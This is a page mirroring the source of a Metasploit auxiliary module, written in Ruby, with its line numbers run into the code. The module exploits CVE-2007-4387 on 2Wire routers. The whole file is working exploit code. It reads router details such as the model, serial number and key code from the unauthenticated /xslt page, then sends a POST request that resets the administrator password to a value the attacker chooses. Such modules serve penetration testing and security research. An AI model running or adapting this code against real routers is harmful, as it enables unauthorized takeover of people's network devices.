CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/admin/2wire/xslt_password_reset.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info={})9super(update_info(info,10'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",11'Description' => %q{12This module will reset the admin password on a 2Wire wireless router. This is13done by using the /xslt page where authentication is not required, thus allowing14configuration changes (such as resetting the password) as administrators.15},16'License' => MSF_LICENSE,17'Author' =>18[19'hkm [at] hakim.ws', #Initial discovery, poc20'Travis Phillips', #Msf module21],22'References' =>23[24[ 'CVE', '2007-4387' ],25[ 'OSVDB', '37667' ],26[ 'BID', '36075' ],27[ 'URL', 'https://seclists.org/bugtraq/2007/Aug/225' ],28],29'DisclosureDate' => '2007-08-15' ))3031register_options(32[33OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])34])35end3637def post_auth?38false39end4041def run4243print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")44res = send_request_raw(45{46'method' => 'GET',47'uri' => '/xslt?PAGE=A07',48}, 25)4950if not res51print_error("No response from server")52return53end5455# check to see if we get HTTP OK56if (res.code == 200)57print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")58else59print_error("Did not get HTTP 200, URL was not found. Exiting!")60return61end6263# Check to verify server reported is a 2wire router64if (res.headers['Server'].match(/2wire Gateway/i))65print_status("Server is a 2wire Gateway! Grabbing info\n")66else67print_error("Target doesn't seem to be a 2wire router. Exiting!")68return69end7071print_status("---===[ Router Information ]===---")7273# Grabbing the Model Number74if res.body.match(/<td class="textmono">(.*)<\/td>/i)75model = $176print_status("Model: #{model}")77end7879# Grabbing the serial Number80if res.body.match(/<td class="data">(\d{12})<\/td>/i)81serial = $182print_status("Serial: #{serial}")83end8485# Grabbing the Hardware Version86if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)87hardware = $188print_status("Hardware Version: #{hardware}")89end9091# Check the Software Version92if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)93ver = $194print_status("Software version: #{ver}")95else96print_error("Target is not a version 5 router. Exiting!")97return98end99100# Grabbing the Key Code101if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)102key = $1103print_status("Key Code: #{key}\n")104end105106print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")107print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")108109res = send_request_raw(110{111'method' => 'GET',112'uri' => '/xslt?PAGE=H04',113}, 25)114115if ( res and res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))116print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")117118data = 'PAGE=H04_POST'119data << '&THISPAGE=H04'120data << '&NEXTPAGE=A01'121data << '&PASSWORD=' + datastore['PASSWORD']122data << '&PASSWORD_CONF=' + datastore['PASSWORD']123data << '&HINT='124125res = send_request_cgi(126{127'method' => 'POST',128'uri' => '/xslt',129'data' => data,130}, 25)131132if res and res.code == 200133cookies = res.get_cookies134if cookies && cookies.match(/(.*); path=\//)135cookie= $1136print_good("Got cookie #{cookie}. Password reset was successful!\n")137end138end139end140141end142end143144145